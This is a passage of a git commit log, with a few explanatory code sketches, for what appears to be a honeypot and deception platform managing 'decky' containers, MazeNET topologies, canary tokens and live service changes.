- New engine helper update_service_config wires both fleet and topology paths
  through the existing _persist_fleet_change / _rerender_topology_compose
  machinery; emits decky.<name>.service_config_changed on the bus.
2026-04-29 11:38:06 -04:00
54b1fbed14 feat(services): declarative config_schema on BaseService + SSH/HTTP/HTTPS descriptors
ServiceConfigField dataclass + BaseService.validate_cfg coerce/drop submitted
service_cfg dicts against per-service typed schemas. SSH/HTTP/HTTPS now declare
the keys they already read in compose_fragment, so the upcoming Inspector form
has metadata to render from instead of hardcoded inputs per service.
2026-04-29 11:28:53 -04:00
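Sketch for 54b1fbed14: one way coerce/drop validation against a typed schema could work. The field attributes (key, type), the supported type names and the free-function form of validate_cfg are all assumptions; the commit only names ServiceConfigField and BaseService.validate_cfg.

```python
from dataclasses import dataclass


@dataclass(frozen=True)
class ServiceConfigField:
    key: str
    type: str  # assumed vocabulary: "string", "int" or "bool"


def _coerce(field, value):
    if field.type == "int":
        if isinstance(value, bool):
            raise ValueError(f"{field.key}: expected int, got bool")
        try:
            return int(value)
        except (TypeError, ValueError):
            raise ValueError(f"{field.key}: expected int") from None
    if field.type == "bool":
        if isinstance(value, bool):
            return value
        if isinstance(value, str) and value.lower() in ("true", "false"):
            return value.lower() == "true"
        raise ValueError(f"{field.key}: expected bool")
    return str(value)


def validate_cfg(schema, submitted):
    """Coerce known keys to their declared type; drop unknown keys."""
    by_key = {field.key: field for field in schema}
    return {
        key: _coerce(by_key[key], value)
        for key, value in submitted.items()
        if key in by_key
    }
```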
d314470d7f fix(stats): keep TopologyDecky.state in sync with docker so ACTIVE DECKIES counts right
Dashboard's ACTIVE DECKIES (active_deckies in get_stats_summary) counts
TopologyDecky rows where state='running'.  No code path was flipping
that state away from the default 'pending', so the count read 0/N
even when every container was running fine — the dashboard was lying.

Two complementary fixes:

1. deploy_topology — after the post-deploy compose ps verification,
   reconcile each TopologyDecky.state from the corresponding base
   container's docker state.  running → 'running'; anything else →
   'failed'.  Reuses the ps_rows already gathered for the
   ACTIVE-vs-DEGRADED status decision; no extra docker hit.

2. apply_add_decky — _materialise_decky_spawn now returns True/False;
   on True the row is updated to state='running' before
   _assert_valid_after.  Catches the case where a decky added via the
   live mutator queue stays at 'pending' indefinitely (the deployer's
   reconcile only runs on a fresh deploy_topology pass).

Existing topology deckies in active topologies will still read as
'pending' until the next deploy_topology runs, since this is
forward-only.  An operator-side fix is to tear down + redeploy or run
the (forthcoming) reconcile-on-startup pass.
2026-04-29 11:09:32 -04:00
57e527534c fix(mutator): auto-fall-back to legacy builder when buildx wedges live decky add
apply_add_decky's compose-up was hard-failing whenever the operator's
~/.docker/buildx/activity/ landed on a read-only mount — the wedge
detection in _compose_with_retry correctly refuses to retry (would
just leak more mounts), but for live materialisation we don't want a
wedged buildx state to abort an admin's mutation.  ANTI hit it on
adding decky-a977: 'failed to update builder last activity time: ...
read-only file system → buildx wedge detected → returned non-zero'.

_compose_up_with_buildkit_fallback wraps _compose_with_retry: on a
CalledProcessError whose stderr matches both wedge signatures
(_BUILDX_WEDGE_SIGNATURE + _BUILDX_EROFS_SIGNATURE), it logs a
warning with the manual recovery steps + retries once with
DOCKER_BUILDKIT=0 set.  The legacy non-buildx builder doesn't use
the activity dir and isn't affected.

Wired into the two paths that pass --build:
* _materialise_decky_spawn (apply_add_decky)
* _materialise_decky_services_diff (apply_update_decky service add)

_materialise_decky_recreate_base doesn't build — it just recreates a
container from an existing image — so it's not affected.

Operator-facing log message points at the manual fix
(rm -rf ~/.docker/buildx/activity + docker buildx create) so they
can recover at their leisure; we don't ATTEMPT the recovery because
the activity dir might be RO for a reason (zfs/btrfs snapshot, etc.)
that an automated rm would be wrong to fight.
2026-04-29 10:59:04 -04:00
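Sketch for 57e527534c: retry-once with the legacy builder when both wedge signatures appear in stderr. The signature strings are guessed from the error quoted in the commit, and the injected run callable stands in for _compose_with_retry, whose real signature is not shown.

```python
import subprocess

# Assumed values, taken from the error text quoted in the commit message.
WEDGE_SIGNATURE = "failed to update builder last activity time"
EROFS_SIGNATURE = "read-only file system"


def compose_up_with_fallback(run, args, env):
    """Call run(args, env); on a buildx wedge retry once without BuildKit."""
    try:
        return run(args, env)
    except subprocess.CalledProcessError as exc:
        stderr = exc.stderr or ""
        if isinstance(stderr, bytes):
            stderr = stderr.decode("utf-8", errors="replace")
        if WEDGE_SIGNATURE in stderr and EROFS_SIGNATURE in stderr:
            # The legacy builder does not touch the buildx activity dir.
            return run(args, {**env, "DOCKER_BUILDKIT": "0"})
        raise
```

Any failure that does not match both signatures is re-raised unchanged, so unrelated compose errors keep their original behaviour.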
892219ec87 feat(mutator): refuse forwards_l3 promotion on non-DMZ deckies
apply_update_decky's flip path now refuses to promote a decky to
gateway unless its home LAN is a DMZ.  The compose generator publishes
host ports for forwards_l3=True; a non-DMZ gateway would shadow the
host's port space without anything legitimately able to reach the
service.  Same posture as the existing 'forwards_l3 flip on live
requires force=true' guard — refused before any DB write so a bad
mutation leaves zero side-effects.

The check is intentionally NOT a standing _RULES invariant — the
codebase uses forwards_l3 for two semantics:

  1. Generic L3 forwarding (internal bridge deckies routing between
     their multi-home LANs).  The generator writes this on internal
     bridges via bridge_forward_probability; legitimately non-DMZ.
  2. DMZ gateway (host-port publisher).  Only meaningful on DMZ.

Standing validation can't enforce DMZ-homing without breaking case 1.
The guard fires only on the explicit user-driven flip path where the
operator's intent is unambiguously case 2.  Generator output and
internal-bridge attachments bypass the check.

check_gateway_homed_in_dmz lives in validate.py for callers that want
the explicit form (and for the test surface), but is not a standing
rule — comment in _RULES explains the asymmetry.
2026-04-29 00:38:51 -04:00
c002c5a4f1 feat(ui): forwards_l3 toggle in Inspector with destructive-recreate confirm
W5's apply_update_decky now accepts a forwards_l3 flip on a live
topology only when payload['force'] is true (the unforced flip raises
MutationError to keep half-thinking operators from killing
in-container state).  Until this commit there was no UI surface that
could even submit such a flip.

Inspector grows a 'PROMOTE TO GATEWAY' / 'DEMOTE GATEWAY' button when
a (non-observed) decky is selected.  The handler:

* On pending topologies → submits via editor.updateDecky immediately.
  No confirm dialog; no live containers to disturb.
* On active/degraded topologies → window.confirm() explaining the
  destructive base recreate ('In-container state is lost; active
  sessions to it drop'), then submits with extras.force=true.

useTopologyEditor.updateDecky grows an optional extras arg that
threads force: true into the queued mutation payload.  The pending
CRUD path ignores it (no force needed when no containers exist).

MazeNET.tsx wires a toggleGateway callback that handles the
optimistic local state update, surfaces an enqueue toast on the
active path, and lets the SSE forwarder reconcile when
mutation.applied lands.
2026-04-29 00:29:46 -04:00
a27e3f5e0f fix(tests+mutator): unbreak the docker-shadow test env + let mutator delete from active
Two related fixes that came out of running the W5 tests locally:

1. tests/__init__.py — empty file, makes 'tests/' a package so pytest
   stops inserting it into sys.path.  Without it, 'tests/docker/'
   (the docker-image test category) shadowed the installed docker SDK
   on every engine-touching test in the repo:

     module 'docker' has no attribute 'DockerClient'

   Pytest's default --import-mode=prepend was the culprit; making
   tests/ a package is the cheapest fix and doesn't change
   --import-mode for the whole tree.

2. delete_topology_decky / delete_topology_edge / delete_lan grow an
   'enforce_pending: bool = True' kwarg.  Default preserves the HTTP
   CRUD guard (api_decky_crud / api_edge_crud / api_lan_crud get the
   409 for free).  apply_remove_decky / apply_detach_decky /
   apply_remove_lan now pass enforce_pending=False — the mutator
   queue is the live-editing surface and has its own active-topology
   gating; the repo's pending-only guard was for design-time CRUD
   that mustn't bypass it.  Without this, apply_remove_decky was
   silently broken on active topologies pre-W5; W5's new test
   surfaced it on first run.

10/10 new W5 tests pass; 58/58 across mutator + topology suites.
2026-04-29 00:24:17 -04:00
98c929894c feat(mutator): selective materialisation for apply_update_decky + tests
apply_update_decky now discriminates three sub-cases:

* services list changed → diff old vs new and call
  _materialise_decky_services_diff (compose up -d for added,
  stop + rm -f for removed).  Mirrors services_live's pattern but
  doesn't import it — mutator-routed mutations carry a different bus
  surface (mutation.applied) than the direct API path
  (decky.<name>.service_added).
* forwards_l3 flipped → port publishing changes, which docker can
  only apply at container-create time.  Gated on payload['force'] being
  true; default raises MutationError so a half-thinking operator
  can't stomp a live decky.  When force=true,
  _materialise_decky_recreate_base does compose up -d --no-deps
  --force-recreate.  Pre-checked BEFORE the DB write so a refused
  mutation leaves zero side-effects.
* coord-only (x/y) → DB only, no docker work.

Ships tests/mutator/test_ops_materialisation.py with focused coverage
for every new helper: add_decky/remove_decky/attach_decky/
detach_decky/update_decky/update_lan paths against an active
topology, with compose primitives + docker SDK mocked at the source
modules so the helpers' lazy imports pick up the stubs.  Also covers
the pending-topology skip and the force-flag gating.
2026-04-29 00:18:20 -04:00
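The three sub-cases in 98c929894c can be sketched as a small classifier. This is illustrative only: classify_update and services_diff are hypothetical names, the dict shapes are assumed, and giving a forwards_l3 flip priority over a simultaneous services change is an assumption the commit message does not confirm.

```python
class MutationError(Exception):
    """Stand-in for the mutator's error type."""


def classify_update(old: dict, new: dict, payload: dict) -> str:
    """Return which materialisation path an update would take."""
    if old["forwards_l3"] != new["forwards_l3"]:
        # Checked before any DB write so a refusal has no side effects.
        if payload.get("force") is not True:
            raise MutationError("forwards_l3 change needs force=true")
        return "recreate_base"
    if set(old["services"]) != set(new["services"]):
        return "services_diff"
    return "db_only"  # coord-only (x/y) update


def services_diff(old: list[str], new: list[str]) -> tuple[list[str], list[str]]:
    added = sorted(set(new) - set(old))    # would be 'compose up -d' targets
    removed = sorted(set(old) - set(new))  # would be 'stop' + 'rm -f' targets
    return added, removed
```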
e3afec4e70 feat(mutator): live network.disconnect for apply_detach_decky
Symmetric to apply_attach_decky — after deleting the multi-home edge
from the DB, calls the docker SDK to drop the base container's
interface in the now-detached LAN.  Service containers lose
visibility automatically (they share the base's netns).

Idempotency: 'not connected' / 'no such' APIError is logged at info
and treated as success.
2026-04-29 00:15:39 -04:00
f347a3a736 feat(mutator): live network.connect for apply_attach_decky
After the DB writes that record the multi-home edge, calls the docker
SDK directly to add an interface to the base container's netns:

  client.networks.get(<topology bridge>).connect(<base>, ipv4_address=ip)

Non-destructive — the base keeps running, no recreate.  Service
containers automatically see the new interface because they share
the base's netns via network_mode: service:<base>.

Idempotency: docker APIError with 'already' / 'endpoint exists' is
logged at info and treated as success.  Other errors log + leave the
DB row in place; an operator retry will hit the same path.
2026-04-29 00:15:11 -04:00
eed55619cb feat(mutator): live teardown for apply_remove_decky
Captures the decky's name and services list before delete_topology_decky
runs (the helper needs both as compose targets even though the DB row
is gone), then calls _materialise_decky_remove which stops + rm -f's
the base + per-service containers via 'docker compose stop / rm -f'.

Re-renders the per-topology compose AFTER the stop/rm so a future
'compose up -d' on the file doesn't try to bring the decky back.
2026-04-29 00:14:44 -04:00
8c06190e69 feat(mutator): live spawn for apply_add_decky + shared materialisation helpers
Adds _materialise_decky_{spawn,remove,connect,disconnect,services_diff,recreate_base}
helpers alongside the existing _materialise_lan_change.  Each follows
the same skip rules: bail when topology is not active/degraded, when
agent-pinned, or when docker calls fail (logged, not re-raised — DB
remains source of truth).

apply_add_decky now calls _materialise_decky_spawn after the DB writes.
The helper:

* re-renders the per-topology compose so it lists the new decky;
* runs 'compose up -d --no-deps --build <decky_base> <decky>-<svc>...'
  in a worker thread (matches engine/services_live's pattern).

Service container targets are filtered through get_service() so
fleet_singleton services are skipped — they don't have per-decky
compose entries.  Gateway (forwards_l3=True) deckies need no
special-case here; the compose generator already emits the host
'ports:' block for them.

Subsequent commits wire the other apply_* ops to the matching
helpers.  Tests for the full set ship in the workstream's last
commit.
2026-04-29 00:14:18 -04:00
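The target filtering in 8c06190e69 can be pictured as below. This is a sketch, not the helper itself: compose_targets is a hypothetical name, and the set of fleet_singleton services is passed in directly instead of being looked up through get_service().

```python
def compose_targets(base: str, decky: str, services: list[str],
                    fleet_singletons: set[str]) -> list[str]:
    """Build the service names handed to 'compose up -d --no-deps --build'."""
    # fleet_singleton services have no per-decky compose entry, so skip them.
    per_decky = [svc for svc in services if svc not in fleet_singletons]
    return [base] + [f"{decky}-{svc}" for svc in per_decky]
```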
578cdf9e2e fix(mutator): reject hostile apply_update_lan changes on live topologies
subnet and is_dmz are pinned at deploy time — live deckies bind to
the bridge with IPs allocated from the old subnet, and is_dmz flips
the docker network's internal flag which can't be changed while
containers are attached.  Today the op happily wrote the new value
into the DB and left docker on the old one, drifting the two surfaces.

apply_update_lan now raises MutationError when topology status is
active or degraded and the patch touches subnet or is_dmz.  Coord
(x/y) and rename updates still pass through; renames don't currently
have a live caller and the bridge's docker name keys off the lan name
in the renderer, so the next deploy will reconcile.

This matches the posture taken by _materialise_lan_change for live
LAN add/remove (commit 472c84b).
2026-04-29 00:12:44 -04:00
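The guard added in 578cdf9e2e reduces to a set intersection. A minimal sketch, assuming lowercase status strings and a dict-shaped patch; check_lan_patch is a hypothetical name:

```python
class MutationError(Exception):
    """Stand-in for the mutator's error type."""


_LIVE_STATUSES = {"active", "degraded"}
_PINNED_FIELDS = {"subnet", "is_dmz"}  # fixed at deploy time


def check_lan_patch(status: str, patch: dict) -> None:
    """Refuse patches that would drift docker away from the DB."""
    touched = _PINNED_FIELDS & patch.keys()
    if status in _LIVE_STATUSES and touched:
        raise MutationError(
            f"cannot change {sorted(touched)} on a {status} topology")
```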
2731b2608b fix(ui): keep multi-homed deckies in their home LAN on rehydrate
list_topology_edges has no ORDER BY, so SQL row order is undefined.
After apply_attach_decky added a bridge edge to a second LAN, on
refetch the bridge edge could come back first — firstLanFor then
picked it as the decky's home and the visualization 'teleported' the
decky into the other LAN (the bug ANTI saw immediately after
connecting two deckies across LANs).

Hydration now prefers the non-bridge edge (is_bridge=false) as home.
apply_add_decky writes is_bridge=false for the original edge;
apply_attach_decky writes is_bridge=true for subsequent multi-homing
edges.  Picking the non-bridge edge is stable across row reordering.

Two-pass implementation: pass 1 sets pinned homes (DMZ for gateways,
non-bridge for others); pass 2 fills any gap with the first edge
(legacy rows where is_bridge was never written).
2026-04-29 00:01:29 -04:00
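The two-pass hydration in 2731b2608b lives in the frontend; the sketch below restates the idea in Python for illustration only. The edge dict shape, the gateways set, and the function name are assumptions.

```python
def pick_home_lans(edges: list[dict], gateways: set[str], dmz_lan: str) -> dict[str, str]:
    """Pick a stable home LAN per decky regardless of edge row order."""
    homes: dict[str, str] = {}
    # Pass 1: pinned homes (DMZ for gateways, the non-bridge edge for others).
    for edge in edges:
        decky = edge["decky"]
        if decky in homes:
            continue
        if decky in gateways:
            if edge["lan"] == dmz_lan:
                homes[decky] = dmz_lan
        elif edge.get("is_bridge") is False:
            homes[decky] = edge["lan"]
    # Pass 2: legacy rows where is_bridge was never written fall back
    # to the first edge seen.
    for edge in edges:
        homes.setdefault(edge["decky"], edge["lan"])
    return homes
```

Because pass 1 never looks at position, reversing the edge list yields the same home for any decky that has a non-bridge edge.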
472c84b9c8 fix(mutator): materialise live LAN add/remove on docker, not just the DB
apply_add_lan and apply_remove_lan were DB-only — they wrote/deleted
the topology_lans row but never created or destroyed the docker bridge
network.  Adding a LAN to a deployed topology silently did nothing on
the substrate side; any decky later attached to it had nowhere to bind.

Both ops now call a shared _materialise_lan_change helper after the DB
write.  When the topology is active/degraded and not pinned to a swarm
agent, the helper:

* creates / removes the docker bridge network (internal=True for
  non-DMZ LANs, mirroring engine/deployer.deploy_topology),
* re-renders the per-topology compose file so future redeploys reflect
  the change.

Failures are logged, not re-raised — the DB row stays as source of
truth so an operator can retry without leaking inconsistent state.
Agent-pinned topologies are skipped; the next agent push reconciles.

apply_add_decky / apply_attach_decky have the same gap and are not
fixed here — multi-homing a running container needs careful
recreate-vs-network-connect handling and is its own commit.  Without
those, dropping a decky into a freshly-added LAN still won't spawn a
container; only the LAN itself is now live.
2026-04-29 00:00:02 -04:00
bbed52a962 fix(bus): topic segments can't contain dots — service.added → service_added
Bus topic segments are NATS-style tokens and the validator at
bus/topics.py:402 rejects '.', '*', '>', whitespace.  My W3 constants
'service.added' / 'service.removed' tripped this on every live
add/remove call:

  ValueError: topic segment 'service.added' may not contain '.', ...

Renamed both to underscore form: DECKY_SERVICE_ADDED = 'service_added'.
Aligned the SSE forwarder's name mapping (decky.<name>.service_added →
SSE event 'decky.service_added') and the frontend's
useTopologyStream listener + MazeNET.tsx event handler.  Also updated
the wiki entry with a note about the underscore.
2026-04-28 23:53:25 -04:00
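The segment rule that bbed52a962 ran into can be sketched as follows. This is not the validator at bus/topics.py; the function names are hypothetical, and rejecting empty segments is an added assumption.

```python
_FORBIDDEN = (".", "*", ">")


def validate_segment(segment: str) -> str:
    """Reject characters that have meaning in NATS-style subjects."""
    if (not segment
            or any(ch in segment for ch in _FORBIDDEN)
            or any(ch.isspace() for ch in segment)):
        raise ValueError(
            f"topic segment {segment!r} may not contain '.', '*', '>' or whitespace")
    return segment


def decky_topic(name: str, leaf: str) -> str:
    # Dots only ever appear as separators between validated segments.
    return ".".join(("decky", validate_segment(name), validate_segment(leaf)))
```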
d595240f55 fix(engine): post-deploy verify topology containers, mark DEGRADED on boot crash
deploy_topology was flipping to ACTIVE the moment 'compose up -d'
returned 0, but compose returns 0 as soon as containers are *started*.
A service that crashes on boot (port bind failure, bad image, missing
entrypoint) left the topology row sitting at ACTIVE indefinitely while
half the substrate was dead.

After compose returns, we now run 'compose ps --all --format json',
parse the newline-delimited per-container rows, and downgrade to
DEGRADED with a reason listing the first eight unhealthy containers if
anything isn't in state='running'.  Operators see real state on the
topology page instead of an optimistic flag.

_compose_ps swallows compose-level errors (returns []) so an unrelated
docker hiccup doesn't gate the success path — the existing in-flight
exception path still catches genuine deploy failures with FAILED.
2026-04-28 23:39:50 -04:00
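The post-deploy check in d595240f55 parses one JSON object per line. A minimal sketch, assuming each row carries "Name" and "State" keys as in Docker Compose v2 output; the function names and the reason format are hypothetical.

```python
import json


def unhealthy_containers(ps_output: str, limit: int = 8) -> list[str]:
    """Return up to `limit` containers whose state is not 'running'."""
    bad = []
    for line in ps_output.splitlines():
        line = line.strip()
        if not line:
            continue
        row = json.loads(line)
        if row.get("State") != "running":
            bad.append(f"{row.get('Name', '?')} ({row.get('State', 'unknown')})")
    return bad[:limit]


def status_for(ps_output: str) -> str:
    # Empty output (for example a swallowed compose error) keeps ACTIVE.
    return "DEGRADED" if unhealthy_containers(ps_output) else "ACTIVE"
```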
9e8d0b0464 fix(ui): route palette drops + design-time remove through live API on active topologies
When topoStatus is active/degraded, editor.updateDecky enqueues into
the mutator queue and returns {kind:'enqueued'}.  The palette-drop
handler then short-circuits on that and never updates local state, so
a service dragged onto a deployed decky just vanishes — what ANTI saw
as 'no way to APPLY'.

Same gap on the design-time 'REMOVE SERVICE' button in the Inspector's
service detail panel: enqueue + no local update = chip stays.

Both now route through liveAddService / liveRemoveService when the
topology is active, hitting POST/DELETE /topologies/{id}/deckies/{name}/services
directly and patching local state from the response.  Pending
topologies still queue through the mutator (correct: no live
containers to mutate).

Hoisted serviceRegistry / liveAddService / liveRemoveService above
the palette-drop callback so the deps array doesn't trip the const
TDZ at render time.
2026-04-28 23:38:37 -04:00
463877b8fc fix(ui): hit /topologies/ with trailing slash to keep bearer
FastAPI's redirect_slashes=True 307s /topologies → /topologies/, and
the browser drops Authorization on the redirected URL — the topology
picker in the canary create modal was landing as 401 even for admins.
Hit the canonical (trailing-slash) path so the request resolves on the
first hop.
2026-04-28 23:18:39 -04:00
0e5484648f feat: forward decky.*.service.* on per-topology SSE stream
The /topologies/{id}/events SSE proxy now subscribes to two bus
patterns concurrently and merges them through a bounded asyncio.Queue:

* topology.{id}.>  — lifecycle (status, mutation.*) — unchanged.
* decky.>          — per-decky events, filtered by payload.topology_id
                     so a fleet decky sharing a name with a topology
                     decky doesn't leak across.

_sse_name_for routes 'decky.<name>.service.added' to the SSE event
name 'decky.service.added' (kept the prefix so the frontend doesn't
collide with topology lifecycle events that share leaf names like
'status').

useTopologyStream surfaces the two new event names; MazeNET.tsx's
onStreamEvent optimistically patches the matching node's services
list so a second tab reflects shape changes without a refetch.
2026-04-28 23:15:38 -04:00
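The merge described in 0e5484648f can be sketched with two pump tasks feeding one bounded queue. This is an illustration under assumptions: the event dict shape, the sentinel, and all names are hypothetical, sources are finite so the sketch can terminate, and error handling in the pumps is omitted.

```python
import asyncio
from typing import AsyncIterator, Callable

_DONE = object()  # sentinel: one per exhausted source


async def _pump(source: AsyncIterator[dict], queue: asyncio.Queue,
                keep: Callable[[dict], bool]) -> None:
    async for event in source:
        if keep(event):
            await queue.put(event)  # blocks while the queue is full
    await queue.put(_DONE)


async def merged_events(lifecycle: AsyncIterator[dict], decky: AsyncIterator[dict],
                        topology_id: str, maxsize: int = 64) -> AsyncIterator[dict]:
    queue: asyncio.Queue = asyncio.Queue(maxsize=maxsize)

    def same_topology(event: dict) -> bool:
        # Drop events from a fleet decky that merely shares a name.
        return event.get("payload", {}).get("topology_id") == topology_id

    tasks = [
        asyncio.create_task(_pump(lifecycle, queue, lambda event: True)),
        asyncio.create_task(_pump(decky, queue, same_topology)),
    ]
    finished = 0
    try:
        while finished < len(tasks):
            item = await queue.get()
            if item is _DONE:
                finished += 1
            else:
                yield item
    finally:
        for task in tasks:
            task.cancel()
```

The bounded queue gives backpressure: a slow SSE client stalls the pumps instead of growing memory without limit.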
e7d49d7237 feat(ui): live service add/remove on fleet DeckyCard
DeckyCard grows the same per-chip × + dashed '+ ADD' affordances we
just shipped on the MazeNET Inspector.  Wired to POST/DELETE
/api/v1/deckies/{name}/services{,/svc}; the response's services list
flows back through onServicesChanged to update the parent's deckies
state without a refetch.

Gated on isAdmin && !decky.swarm — swarm deckies live on a remote
agent and the W3 endpoint runs docker compose locally, same gap as
the canary planter has for agent-pinned topologies.  Out of scope
here; flagged as a known limitation.

stopPropagation on the inline buttons + add-row container keeps the
card-level click (which selects the decky for inspection) from firing
on intra-row interactions.
2026-04-28 23:13:46 -04:00
1a631c9400 fix(ui): narrow services type for Inspector live-add picker
ObservedNode.services is the literal tuple ['*']; narrowing inside the
.filter() callback was tripping TS2345.  We already gate the live
controls on node.kind !== 'observed', so casting to readonly string[]
inside the filter is safe and keeps the discriminated union strict
elsewhere.
2026-04-28 23:11:39 -04:00
2fabcd1c29 feat(ui): live service add/remove on MazeNET Inspector
When the topology is active/degraded the Inspector switches services
chips into live controls: each chip gets a × button that DELETEs to
the W3 endpoint, and a dashed '+ ADD' chip opens a typeahead picker
fed by useServiceRegistry().perDecky.

Pending topologies still use the existing design-time path
(onRemoveService → editor.updateDecky); the Inspector picks based on
topologyStatus, so an operator never accidentally hits a live API
call against a topology that isn't deployed yet.

The mutation handlers in MazeNET.tsx hit POST/DELETE
/api/v1/topologies/{id}/deckies/{name}/services{,/svc} and
optimistically apply the response's services list to local state.
Cross-tab reconciliation rides on the SSE forwarder shipped in the
follow-up commit.
2026-04-28 23:11:02 -04:00
06f208c86e feat: surface fleet_singleton flag on /topologies/services
Adds a fleet_singletons array to ServiceCatalogResponse so per-decky
add UIs can filter out services like LLMNR that run once fleet-wide
(and would 422 server-side at the live add endpoint).

The existing 'services: list[str]' field is unchanged for back-compat
with MazeNET/useMazeApi.ts:257; the new field is additive.

decnet_web/src/hooks/useServiceRegistry.ts wraps the endpoint with a
module-scoped cache (registry only changes on BYOS install / plugin
drop, neither of which happens mid-session) and exposes a precomputed
.perDecky list so consumers don't need to re-derive the diff.
2026-04-28 23:08:29 -04:00
4287e94deb feat(ui): file drops tab on CanaryTokens
CanaryTokens.tsx grows a third tab — File drops — alongside Tokens
and Blobs.  The page now covers every 'admin landed bytes on a decky'
operation in one place.

FileDropModal mirrors the canary CreateModal's shape: Fleet/MazeNET
toggle, topology+decky picker, absolute-path validation matching the
backend (DeckyFileDropRequest rejects relative + ..-traversal), mode
+ mtime offset inputs, and a -1w preset for backdating.  FileReader →
data URL → strip prefix → POST /api/v1/deckies/files.

The list is local-only (localStorage, capped at 200 entries).  W2's
backend doesn't persist drops by design — the endpoint is for staging
payloads, not as an audit trail.  CLEAR LIST button on the tab; no
DELETE button on rows since the local entry doesn't track whether the
file is still there (an attacker may have moved it).

Alt+D shortcut joins Alt+C; alt-key only per the Linux-meta-key rule.
2026-04-28 23:06:53 -04:00
c942d4d333 feat(ui): scope canary tokens to MazeNET topology deckies
CanaryTokens.tsx grows a Fleet/MazeNET toggle in the create modal.  In
topology mode we hydrate /topologies?status=active for the topology
picker, then GET /topologies/{id} on selection to repopulate the decky
picker — topology deckies have a different shape than fleet's /deckies
endpoint.

The tokens table gains a SCOPE column (chip: 'fleet' / 'topology'),
and a third filter dropdown alongside state.  The drawer's metadata
section shows a Scope row with a clickable jump-link back to the
MazeNET view at the right topology.

CanaryTokenRow grows a topology_id field so the drawer/list can
discriminate without re-fetching.
2026-04-28 23:04:13 -04:00
6ac8cac908 feat(deckies): live service add/remove without full redeploy
decnet.engine.services_live exposes add_service / remove_service for
both fleet and topology decky scopes.  The host's _compose() wrapper
already supported per-service targeting (up --no-deps -d <svc>,
stop, rm -f); what was missing was the orchestration around it:

* add: validate against decnet.services.registry (rejects unknown +
  fleet_singleton); persist the new services list; re-render the
  per-scope compose file (so future redeploys reflect the change);
  run docker compose up -d --no-deps --build <decky>-<svc>.
* remove: stop + rm -f the service container; persist; re-render
  compose so a future up -d doesn't bring it back.

Both publish decky.<name>.service.added / .removed on the bus, with
the post-mutation services list.  Topic constants added to
decnet.bus.topics; the matching wiki entry in wiki-checkout/Service-Bus.md
ships in a separate commit on the wiki repo (wiki-checkout/ is gitignored).

Four new admin endpoints:

* POST/DELETE /api/v1/deckies/{name}/services{,/svc}
* POST/DELETE /api/v1/topologies/{id}/deckies/{name}/services{,/svc}

ServiceMutationError messages are mapped at the API boundary to 404
(decky/topology missing), 409 (idempotency violation), 422 (unknown
or fleet_singleton service).
2026-04-28 22:51:42 -04:00
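The validation order and status mapping from 6ac8cac908 could be sketched like this. Note the assumption: the commit says error messages are mapped at the API boundary, whereas this sketch uses a hypothetical Reason enum for brevity; validate_add and http_status are illustrative names too.

```python
from enum import Enum


class Reason(Enum):
    NOT_FOUND = "not_found"
    ALREADY_IN_STATE = "already_in_state"
    INVALID_SERVICE = "invalid_service"


_STATUS = {
    Reason.NOT_FOUND: 404,         # decky or topology missing
    Reason.ALREADY_IN_STATE: 409,  # idempotency violation
    Reason.INVALID_SERVICE: 422,   # unknown or fleet_singleton service
}


class ServiceMutationError(Exception):
    def __init__(self, reason: Reason, message: str) -> None:
        super().__init__(message)
        self.reason = reason


def validate_add(service: str, current: list[str],
                 registry: set[str], fleet_singletons: set[str]) -> None:
    if service not in registry:
        raise ServiceMutationError(Reason.INVALID_SERVICE, f"unknown service {service}")
    if service in fleet_singletons:
        raise ServiceMutationError(Reason.INVALID_SERVICE, f"{service} is fleet-wide")
    if service in current:
        raise ServiceMutationError(Reason.ALREADY_IN_STATE, f"{service} already present")


def http_status(error: ServiceMutationError) -> int:
    return _STATUS[error.reason]
```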
0bc4b05c73 feat(deckies): generic file drops on fleet + MazeNET deckies
Extracts the docker-exec-with-base64-stdin pattern out of canary/planter
and orchestrator/drivers/ssh into a shared decnet.decky_io package.
Both consumers now delegate; the canary planter test still proves the
contract end-to-end.

Adds POST/DELETE /api/v1/deckies/files for arbitrary file drops.
Container resolution is shared with the canary path: topology_id absent
means fleet (<name>-ssh), present routes through resolve_decky_container
which picks <name>-ssh when the topology decky exposes ssh, else the
topology base container decnet_t_<id8>_<name>.

Path validation rejects relative paths and '..' traversal at the request
model layer.  Bad base64 → 400; unknown topology → 404; decky not in
topology → 422; docker exec failure → 409.
2026-04-28 22:43:34 -04:00
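The path check and container resolution in 0bc4b05c73 can be sketched as follows. Assumptions are flagged in the comments: the function names are hypothetical, and treating <id8> as the first eight characters of the topology id is a guess the commit does not confirm.

```python
from typing import Optional, Sequence


def validate_drop_path(path: str) -> str:
    """Reject relative paths and '..' traversal, as the request model does."""
    if not path.startswith("/"):
        raise ValueError("path must be absolute")
    if ".." in path.split("/"):
        raise ValueError("path may not contain '..'")
    return path


def resolve_container(name: str, topology_id: Optional[str] = None,
                      services: Sequence[str] = ()) -> str:
    # No topology_id means fleet scope, which always uses <name>-ssh.
    if topology_id is None or "ssh" in services:
        return f"{name}-ssh"
    # Assumption: <id8> is the first 8 characters of the topology id.
    return f"decnet_t_{topology_id[:8]}_{name}"
```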
3fe999d706 feat(canary): allow custom canaries on MazeNET deckies via API
POST /api/v1/canary/tokens grows an optional topology_id field.  When
present, the server hydrates the topology, validates the named decky is
in it, and resolves the docker container via
planter.resolve_topology_container — <name>-ssh if the decky exposes ssh,
else the topology base container.  Absent ⇒ fleet semantics, unchanged.

The token row gets a nullable topology_id column (no migration helper
per pre-v1 policy).  GET /api/v1/canary/tokens accepts ?topology_id= as
a filter.  DELETE re-resolves the container at revoke time so a
redeployed topology is still reachable.

422 when the named decky isn't in the topology; 404 when the topology
itself doesn't exist.
2026-04-28 22:34:45 -04:00
5802de1f86 feat(canary): seed baseline canaries on MazeNET deckies
Topology deploys now plant the configured canary baseline set on every
decky in the topology, mirroring the fleet-deploy hook. Containers are
resolved via resolve_topology_container — <decky>-ssh when the decky
exposes an ssh service, else the topology base container
decnet_t_<id8>_<decky>.

The planter's plant/revoke/seed_baseline grow an optional container=
kwarg; default preserves the fleet <name>-ssh resolution.
2026-04-28 22:30:11 -04:00
04b0637c24 feat(bounty): wire artifact download into BountyInspector drawer
The Vault page already shows file drops and stored mail (e3ddeb0) but
the inspector drawer had no download button — only the live-feed
ArtifactDrawer/MailDrawer offered raw byte retrieval. Add a DOWNLOAD
RAW action to BountyInspector that fires when bounty_type=artifact,
hitting /artifacts/{decky}/{stored_as}?service=<svc> with the bounty's
own service field (ssh or smtp). Mirrors ArtifactDrawer's blob handling
and 400/403/404 error mapping.

Also widen the icon/label vocabulary: artifact bounties get FileText
(file drops) or Mail (message_stored) instead of the generic Package,
and the inspector header chip mirrors the change.
